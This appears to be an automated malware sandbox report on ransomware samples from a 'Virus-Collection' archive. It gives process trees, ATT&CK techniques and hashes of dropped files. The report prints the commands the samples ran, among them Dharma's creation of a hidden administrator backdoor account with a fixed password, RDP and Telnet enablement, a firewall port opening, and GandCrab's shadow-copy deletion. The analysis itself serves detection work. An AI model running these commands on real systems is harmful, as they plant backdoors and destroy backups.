PID 3740 wrote to memory of 4132	3740	chrome.exe	chrome.exe
PID 3740 wrote to memory of 4132	3740	chrome.exe	chrome.exe
PID 3740 wrote to memory of 4132	3740	chrome.exe	chrome.exe
PID 3740 wrote to memory of 4132	3740	chrome.exe	chrome.exe
PID 3740 wrote to memory of 4132	3740	chrome.exe	chrome.exe
PID 3740 wrote to memory of 4132	3740	chrome.exe	chrome.exe
PID 3740 wrote to memory of 4132	3740	chrome.exe	chrome.exe
PID 3740 wrote to memory of 4132	3740	chrome.exe	chrome.exe
PID 3740 wrote to memory of 4132	3740	chrome.exe	chrome.exe
PID 3740 wrote to memory of 4132	3740	chrome.exe	chrome.exe
PID 3740 wrote to memory of 4132	3740	chrome.exe	chrome.exe
PID 3740 wrote to memory of 4132	3740	chrome.exe	chrome.exe
PID 3740 wrote to memory of 4132	3740	chrome.exe	chrome.exe
PID 3740 wrote to memory of 4132	3740	chrome.exe	chrome.exe
PID 3740 wrote to memory of 4132	3740	chrome.exe	chrome.exe
PID 3740 wrote to memory of 4132	3740	chrome.exe	chrome.exe
PID 3740 wrote to memory of 4132	3740	chrome.exe	chrome.exe
PID 3740 wrote to memory of 4132	3740	chrome.exe	chrome.exe
PID 3740 wrote to memory of 4132	3740	chrome.exe	chrome.exe
PID 3740 wrote to memory of 4132	3740	chrome.exe	chrome.exe
PID 3740 wrote to memory of 4132	3740	chrome.exe	chrome.exe
PID 3740 wrote to memory of 4132	3740	chrome.exe	chrome.exe

Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exe

pid process

4580 attrib.exe

pid	process
4580	attrib.exe

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://github.com/aDarkDev/ConF-Malware
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3740
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffff8ddab58,0x7ffff8ddab68,0x7ffff8ddab78
  2⤵
  PID:632
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1684 --field-trial-handle=1868,i,6353374875217403387,881120776270168189,131072 /prefetch:2
  2⤵
  PID:4532
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2148 --field-trial-handle=1868,i,6353374875217403387,881120776270168189,131072 /prefetch:8
  2⤵
  PID:384
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2216 --field-trial-handle=1868,i,6353374875217403387,881120776270168189,131072 /prefetch:8
  2⤵
  PID:4132
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3056 --field-trial-handle=1868,i,6353374875217403387,881120776270168189,131072 /prefetch:1
  2⤵
  PID:1416
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3068 --field-trial-handle=1868,i,6353374875217403387,881120776270168189,131072 /prefetch:1
  2⤵
  PID:1240
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4444 --field-trial-handle=1868,i,6353374875217403387,881120776270168189,131072 /prefetch:8
  2⤵
  PID:116
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4576 --field-trial-handle=1868,i,6353374875217403387,881120776270168189,131072 /prefetch:8
  2⤵
  PID:2980
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4624 --field-trial-handle=1868,i,6353374875217403387,881120776270168189,131072 /prefetch:8
  2⤵
  PID:912
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4920 --field-trial-handle=1868,i,6353374875217403387,881120776270168189,131072 /prefetch:8
  2⤵
  PID:2472
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4648 --field-trial-handle=1868,i,6353374875217403387,881120776270168189,131072 /prefetch:8
  2⤵
  PID:3508
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4904 --field-trial-handle=1868,i,6353374875217403387,881120776270168189,131072 /prefetch:8
  2⤵
  PID:4216
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4952 --field-trial-handle=1868,i,6353374875217403387,881120776270168189,131072 /prefetch:8
  2⤵
  PID:2472
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2372 --field-trial-handle=1868,i,6353374875217403387,881120776270168189,131072 /prefetch:8
  2⤵
  PID:2004
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4892 --field-trial-handle=1868,i,6353374875217403387,881120776270168189,131072 /prefetch:8
  2⤵
  PID:1176
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=4444 --field-trial-handle=1868,i,6353374875217403387,881120776270168189,131072 /prefetch:1
  2⤵
  PID:2200
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=5068 --field-trial-handle=1868,i,6353374875217403387,881120776270168189,131072 /prefetch:1
  2⤵
  PID:1044
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5236 --field-trial-handle=1868,i,6353374875217403387,881120776270168189,131072 /prefetch:8
  2⤵
  PID:3204
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5420 --field-trial-handle=1868,i,6353374875217403387,881120776270168189,131072 /prefetch:8
  2⤵
  PID:1692
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=5504 --field-trial-handle=1868,i,6353374875217403387,881120776270168189,131072 /prefetch:1
  2⤵
  PID:2472
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=1532 --field-trial-handle=1868,i,6353374875217403387,881120776270168189,131072 /prefetch:1
  2⤵
  PID:372
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5280 --field-trial-handle=1868,i,6353374875217403387,881120776270168189,131072 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1284
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --mojo-platform-channel-handle=1528 --field-trial-handle=1868,i,6353374875217403387,881120776270168189,131072 /prefetch:1
  2⤵
  PID:1404
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=5028 --field-trial-handle=1868,i,6353374875217403387,881120776270168189,131072 /prefetch:1
  2⤵
  PID:3752
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --mojo-platform-channel-handle=6048 --field-trial-handle=1868,i,6353374875217403387,881120776270168189,131072 /prefetch:1
  2⤵
  PID:2124
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5900 --field-trial-handle=1868,i,6353374875217403387,881120776270168189,131072 /prefetch:8
  2⤵
  PID:540
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5776 --field-trial-handle=1868,i,6353374875217403387,881120776270168189,131072 /prefetch:8
  2⤵
  PID:208
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --mojo-platform-channel-handle=5664 --field-trial-handle=1868,i,6353374875217403387,881120776270168189,131072 /prefetch:1
  2⤵
  PID:5104
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6076 --field-trial-handle=1868,i,6353374875217403387,881120776270168189,131072 /prefetch:8
  2⤵
  PID:3172
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5824 --field-trial-handle=1868,i,6353374875217403387,881120776270168189,131072 /prefetch:8
  2⤵
  PID:3020

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
1⤵
PID:1392

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4696

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:1436

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:4892
- C:\Windows\system32\NOTEPAD.EXE
  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\Temp1_Virus-Collection-main.zip\Virus-Collection-main\Windows\Source\Alina\Alina.pass
  2⤵
  PID:3196

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4092

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3580

C:\Users\Admin\AppData\Local\Temp\Temp1_Virus-Collection-main.zip\Virus-Collection-main\Windows\Binaries\Ransomware\DeriaLock.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_Virus-Collection-main.zip\Virus-Collection-main\Windows\Binaries\Ransomware\DeriaLock.exe"
1⤵
- Drops startup file
PID:3216

C:\Windows\SysWOW64\werfault.exe
werfault.exe /h /shared Global\fc55f033f9cc4cefa27abbd6f80c2224 /t 2352 /p 3216
1⤵
PID:1308

C:\Users\Admin\AppData\Local\Temp\Temp1_Virus-Collection-main.zip\Virus-Collection-main\Windows\Binaries\Ransomware\Dharma.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_Virus-Collection-main.zip\Virus-Collection-main\Windows\Binaries\Ransomware\Dharma.exe"
1⤵
- Drops file in System32 directory
PID:380
- C:\Windows\SysWOW64\ac\nc123.exe
  "C:\Windows\system32\ac\nc123.exe"
  2⤵
  - Executes dropped EXE
  PID:1188
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cls
    3⤵
    PID:2496
- C:\Windows\SysWOW64\ac\mssql.exe
  "C:\Windows\system32\ac\mssql.exe"
  2⤵
  - Sets service image path in registry
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious behavior: LoadsDriver
  - Suspicious use of SetWindowsHookEx
  PID:4156
- C:\Windows\SysWOW64\ac\mssql2.exe
  "C:\Windows\system32\ac\mssql2.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:3816
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Windows\system32\ac\Shadow.bat" "
  2⤵
  PID:1832
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Windows\system32\ac\systembackup.bat" "
  2⤵
  PID:3256
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WMIC Group Where "SID = 'S-1-5-32-544'" Get Name /Value | Find "="
    3⤵
    PID:1424
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      WMIC Group Where "SID = 'S-1-5-32-544'" Get Name /Value
      4⤵
      PID:1496
  - - C:\Windows\SysWOW64\find.exe
      Find "="
      4⤵
      PID:2688
- - C:\Windows\SysWOW64\net.exe
    net user systembackup Default3104 /add /active:"yes" /expires:"never" /passwordchg:"NO"
    3⤵
    PID:2480
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 user systembackup Default3104 /add /active:"yes" /expires:"never" /passwordchg:"NO"
      4⤵
      PID:4036
- - C:\Windows\SysWOW64\net.exe
    net localgroup Administrators systembackup /add
    3⤵
    PID:972
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 localgroup Administrators systembackup /add
      4⤵
      PID:3864
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WMIC Group Where "SID = 'S-1-5-32-555'" Get Name /Value | Find "="
    3⤵
    PID:4012
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      WMIC Group Where "SID = 'S-1-5-32-555'" Get Name /Value
      4⤵
      PID:3652
  - - C:\Windows\SysWOW64\find.exe
      Find "="
      4⤵
      PID:4496
- - C:\Windows\SysWOW64\net.exe
    net localgroup "Remote Desktop Users" systembackup /add
    3⤵
    PID:2280
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 localgroup "Remote Desktop Users" systembackup /add
      4⤵
      PID:4336
- - C:\Windows\SysWOW64\net.exe
    net accounts /forcelogoff:no /maxpwage:unlimited
    3⤵
    PID:1132
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 accounts /forcelogoff:no /maxpwage:unlimited
      4⤵
      PID:1920
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
    3⤵
    PID:2632
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f
    3⤵
    PID:552
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v systembackup /t REG_DWORD /d 0x0 /f
    3⤵
    PID:4252
- - C:\Windows\SysWOW64\attrib.exe
    attrib C:\users\systembackup +r +a +s +h
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:4580
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall add portopening TCP 3389 "Remote Desktop"
    3⤵
    - Modifies Windows Firewall
    PID:1336
- - C:\Windows\SysWOW64\sc.exe
    sc config tlntsvr start=auto
    3⤵
    - Launches sc.exe
    PID:1896
- - C:\Windows\SysWOW64\net.exe
    net start Telnet
    3⤵
    PID:2624
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 start Telnet
      4⤵
      PID:3032
- C:\Windows\SysWOW64\ac\EVER\SearchHost.exe
  "C:\Windows\system32\ac\EVER\SearchHost.exe"
  2⤵
  - Executes dropped EXE
  - Enumerates connected drives
  - Drops file in System32 directory
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  PID:3732

C:\Users\Admin\AppData\Local\Temp\Temp1_Virus-Collection-main.zip\Virus-Collection-main\Windows\Binaries\Ransomware\Fantom.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_Virus-Collection-main.zip\Virus-Collection-main\Windows\Binaries\Ransomware\Fantom.exe"
1⤵
PID:1580

C:\Users\Admin\AppData\Local\Temp\Temp1_Virus-Collection-main.zip\Virus-Collection-main\Windows\Binaries\Ransomware\GandCrab.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_Virus-Collection-main.zip\Virus-Collection-main\Windows\Binaries\Ransomware\GandCrab.exe"
1⤵
- Drops startup file
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:4280
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /c vssadmin delete shadows /all /quiet
  2⤵
  PID:2120
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4280 -s 1436
  2⤵
  - Program crash
  PID:3676

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 696 -p 4280 -ip 4280
1⤵
PID:1192

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Defacement

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000019

Filesize
69KB

MD5
86862d3b5609f6ca70783528d7962690

SHA1
886d4b35290775ceadf576b3bb5654f3a481baf3

SHA256
19e1a1ad6c54fc29a402c10c551fa6e70022cefca6162a10640ee7d9b85783ed

SHA512
f0746c23a06effd14e1e31b0ea7d12156ff92b1f80445aa46e1a4c65cf5df4bc94f6dabe7aead01f1bd6a6c7b851b577a11697a186426a2c8dca897c48515ef0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00002d

Filesize
324KB

MD5
699b78e76989974cea3003f386891689

SHA1
20d5b0a2e14214356303a93e686b0ed5384a367b

SHA256
23bacf359b64a54c33e86eecaccfdbc6f69e5ad02e0015228cc721c8de46676e

SHA512
af727cdc4709833ffa0d9e633c82bb036e27232c1f4dea4166df67e8c32ae76a83017127dcf4687466a88449751668f46cd7f1cbf7331a803d041036dca6c767

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00002e

Filesize
138KB

MD5
aee013d40d112120197eb273f9ed26d8

SHA1
eacbaadeeb680bae32ef4a7e6af86b0932eadcdd

SHA256
c9f092d7e7421544cd3653c2e60f50d8088cdbf8ef0276d0531d7bfba1e85aa3

SHA512
252698231d234b4ec1ca2d75a5dd7d9dc5b4f2a9b8830d046e42ea2ebeacac8434a89c03257ac8ed6da563610f50e499bcf9588eb5d5255c116217e400c1ca80

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\temp-index

Filesize
1KB

MD5
d9c0010172ea0b908512162fa77e40d7

SHA1
299ece6b179c7f26b83a9e99416fe8aed468aa31

SHA256
ebec0ce5fc095e7e272f7506b3f83e70fc8253706d67c20b890501cd73250341

SHA512
37eee2224eed1d14e321e782cd838fea7c97a0fc737e5e2fdac1f40ff81b8e4ce44827aad5059219743159b9ba9c94765f4ea426a58f242c1c1e25598f089f4b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
3KB

MD5
23bb0a6393069e1311477788eedc9950

SHA1
985b8093018bb1e4fcdd7e8af790436ee93e994b

SHA256
5cecceabfef7fed509bfb195ee037040702d2327a6e8d60174d9ba2e7ff0db76

SHA512
1ad6e3827ed865210acc8d0ac93b3faf4a7a49013445cf14fa64ef349292ece400e8da9088e1ef373a446ac895eecdd5bb6a4eeed943af97269830ec5ee4d24c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
2KB

MD5
26468e9f339735d50ab9c774648b617c

SHA1
ea04c7eeea1592d86487cf254f3fa175070c77ac

SHA256
ec1826c8dca7fabfe2bcea71d84187ee2aa4c3f4beb5066352c6b7057a3c0d27

SHA512
65ab9a86ba7127245727ee1a4579c9483e2e625c5d69cdbc7d86f47ee3391767b0603adea135f1d5c002593bbc32f9813f5c8d1bad22d8931a37b7638bbe29ba

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
2KB

MD5
585de578d90a9b2ce8b506f9e67164e5

SHA1
0dbc9e464e29ebed7ed714a44325da5c738c227d

SHA256
6c01316da415fdc0bf6e6a1550123bef99ff5c14048e3c1041b9c3ea6463ac5c

SHA512
8a62bcffeb7876f2bec52f8394808e0a7726915b09f0c0bc8cc86e90d67fa14a75980b7071d2b3c0ff2e77533c8182ce3c0c3951559ee062502e5d5bfc595ee6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
2KB

MD5
3fcf2e8251056826bec5ec48e16d40d3

SHA1
90f5e7428f4cc251f79e77fd19928dcad1791082

SHA256
1325a4b62b29505818d8b378b73ed0b1e71c73054b74ccf31d92f2670f57c4c8

SHA512
3c0394fb54a7d9aaa71f33be6d064ec93311b4e613e6c2a87dd75ff636b5e170ed9e5aaef93c0e86cd922de18e4c8c9f91b4d8ec74d859d4a89148abf565887c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
2KB

MD5
a07bd85d0b0080ce1affe09d2e066b73

SHA1
c65a24559c57466d6c1bfc39483e2dbbcbc4d1ad

SHA256
04d34f9f75c1b65a1a02307febdc420e0aa1156332c6c2f9ce94a6cb3233323f

SHA512
131219aac715dcaccb8a44cd2f2deefdeab8f7b1be97d0394c19df8e936e9e1f3455112dcad1ed7b11b601926636dae08261aacc543044b46fc4954916732d35

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
4KB

MD5
74d35f06e47c4ba0e398d64d463d8fdd

SHA1
640eea54d578d311b8e1ef1e2beb1eaa996e64ab

SHA256
a36934018e1a2cb28866c89b12b8e2d931787627de10653d10cb0631f4a1d370

SHA512
a1866e109ea2d4fdb38c1ab544d6f97128428fef313a837c3e35d44ca0b51092bdca478f8cf88562b021d3e4ade069e41b95320e6545b7d542dd97421f4ce219

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
5KB

MD5
5a89744323f292ed13b80657410ed1d6

SHA1
040bacf43fa6b733d8f64e27ae9d8a2a9f05ab59

SHA256
62c47e6407305239c4ec540f13ab18aa65af03c421ad70ccbf19014a4c8ac9f7

SHA512
fc7afda8625017699e82992154bd4bf7e4c3ac6bfc0412bdf9311c8a29303b2ff2eee42f7d3e8ab8f8be5e92e5de1ffad184f866fdada2b28d6a93ea2b5c2d04

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
4KB

MD5
1c40ba7eddd39f350d2964a0527970ad

SHA1
f3648a5db51bba15451656a27a129a12dda91f35

SHA256
038b7140b883e3da684b1d78f797eed87ce6eb7ac7633865a16b7a63e4b30916

SHA512
ebb13ed2e135a49a121ccaccd260b6fcacee715d66b55844252df926465b8eb3b5d965e8ab3d14226c92fd388cd585263c195db2297bf1566e41eaef20e67f98

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
5KB

MD5
d15ecece1c51b89482c9841ea28c3524

SHA1
f2ac562dd8c8c316eaabee5738160c73c23ca9bb

SHA256
73d0e9638c92cd33ee762e1138511545b7db946d1439562541118df825471107

SHA512
5e47cfddb8ce9fa23f6afb8644dd4ad4a0feca71440a1159cd8f27d6a582fd1f2d3a56365493275f35526f6810a9000fe6df39d6fc2d74248735a82b21920ff6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
5KB

MD5
7ab336a0389941a2edd884c43867ab34

SHA1
